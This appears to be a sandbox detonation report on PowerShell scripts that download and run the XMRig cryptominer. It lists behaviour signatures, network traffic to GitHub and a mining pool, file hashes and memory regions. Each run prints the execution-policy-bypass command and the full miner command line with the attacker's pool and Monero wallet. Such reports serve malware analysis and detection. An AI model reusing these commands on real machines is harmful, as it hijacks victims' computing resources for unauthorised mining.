N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/1424-0-0x00007FF8C9B73000-0x00007FF8C9B74000-memory.dmp

memory/1424-5-0x000002423EDD0000-0x000002423EDF2000-memory.dmp

memory/1424-6-0x00007FF8C9B70000-0x00007FF8CA55C000-memory.dmp

memory/1424-10-0x00007FF8C9B70000-0x00007FF8CA55C000-memory.dmp

memory/1424-9-0x0000024257420000-0x0000024257496000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nfhyoskn.b45.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1424-25-0x00007FF8C9B70000-0x00007FF8CA55C000-memory.dmp

memory/1424-48-0x00000242572E0000-0x00000242572F2000-memory.dmp

memory/1424-61-0x00000242572D0000-0x00000242572DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/624-90-0x000002128E100000-0x000002128E120000-memory.dmp

memory/624-91-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/1424-92-0x00007FF8C9B73000-0x00007FF8C9B74000-memory.dmp

memory/1424-93-0x00007FF8C9B70000-0x00007FF8CA55C000-memory.dmp

memory/624-94-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/1424-95-0x00007FF8C9B70000-0x00007FF8CA55C000-memory.dmp

memory/624-96-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-97-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-98-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-99-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-100-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-101-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-102-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-103-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-104-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-105-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-106-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-107-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-108-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-109-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-110-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-111-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-112-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-113-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-114-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-115-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-116-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-117-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-118-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-119-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-120-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-121-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-122-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-123-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-124-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-125-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-126-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-127-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-128-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-129-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-130-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-131-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-132-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-133-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-134-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-135-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-136-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-137-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-138-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-139-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-140-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-141-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-142-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-143-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-144-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-145-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-146-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-147-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-148-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-149-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-150-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-151-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-152-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-153-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-154-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-155-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

memory/624-156-0x00007FF76A440000-0x00007FF76B073000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:53

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/5080-0-0x00007FFE8C563000-0x00007FFE8C565000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s3map0eu.in3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5080-9-0x000002DF74210000-0x000002DF74232000-memory.dmp

memory/5080-10-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp

memory/5080-11-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp

memory/5080-12-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp

memory/5080-14-0x000002DF742A0000-0x000002DF742B2000-memory.dmp

memory/5080-15-0x000002DF74280000-0x000002DF7428A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2492-46-0x000001F9E9210000-0x000001F9E9230000-memory.dmp

memory/2492-47-0x000001F9EAB10000-0x000001F9EAB30000-memory.dmp

memory/2492-48-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-49-0x000001F9EAB50000-0x000001F9EAB70000-memory.dmp

memory/2492-50-0x000001F9EAB30000-0x000001F9EAB50000-memory.dmp

memory/5080-51-0x00007FFE8C563000-0x00007FFE8C565000-memory.dmp

memory/5080-52-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp

memory/2492-53-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-54-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-57-0x000001F9EAB30000-0x000001F9EAB50000-memory.dmp

memory/2492-56-0x000001F9EAB50000-0x000001F9EAB70000-memory.dmp

memory/2492-55-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-58-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-59-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-60-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-61-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-62-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-63-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-64-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-65-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-66-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-67-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-68-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-69-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-70-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-71-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-72-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-73-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-74-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-75-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-76-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-77-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-78-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-79-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-80-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-81-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-82-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-83-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-84-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-85-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-86-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-87-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-88-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-89-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-90-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-91-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-92-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-93-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-94-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-95-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-96-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-97-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-98-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-99-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-100-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-101-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-102-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-103-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-104-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-105-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-106-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-107-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-108-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-109-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-110-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-111-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-112-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-113-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-114-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-115-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

memory/2492-116-0x00007FF6A09E0000-0x00007FF6A1613000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:43

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
NL 52.111.243.31:443 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp

Files

memory/1736-0-0x00007FFEEE1A3000-0x00007FFEEE1A5000-memory.dmp

memory/1736-1-0x0000027CBF540000-0x0000027CBF562000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_opdv0kve.3ch.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1736-11-0x00007FFEEE1A0000-0x00007FFEEEC61000-memory.dmp

memory/1736-12-0x00007FFEEE1A0000-0x00007FFEEEC61000-memory.dmp

memory/1736-14-0x00007FFEEE1A0000-0x00007FFEEEC61000-memory.dmp

memory/1736-15-0x0000027CD7F10000-0x0000027CD7F22000-memory.dmp

memory/1736-16-0x0000027CD7B90000-0x0000027CD7B9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2952-47-0x0000022633FA0000-0x0000022633FC0000-memory.dmp

memory/2952-48-0x0000022633FF0000-0x0000022634010000-memory.dmp

memory/2952-49-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-50-0x0000022634010000-0x0000022634030000-memory.dmp

memory/2952-51-0x0000022634030000-0x0000022634050000-memory.dmp

memory/2952-52-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/1736-54-0x00007FFEEE1A0000-0x00007FFEEEC61000-memory.dmp

memory/1736-53-0x00007FFEEE1A3000-0x00007FFEEE1A5000-memory.dmp

memory/2952-55-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/1736-56-0x00007FFEEE1A0000-0x00007FFEEEC61000-memory.dmp

memory/2952-57-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-58-0x0000022634010000-0x0000022634030000-memory.dmp

memory/2952-59-0x0000022634030000-0x0000022634050000-memory.dmp

memory/2952-60-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-61-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-62-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-63-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-64-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-65-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-66-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-67-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-68-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-69-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-70-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-71-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-72-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-73-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-74-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-75-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-76-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-77-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-78-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-79-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-80-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

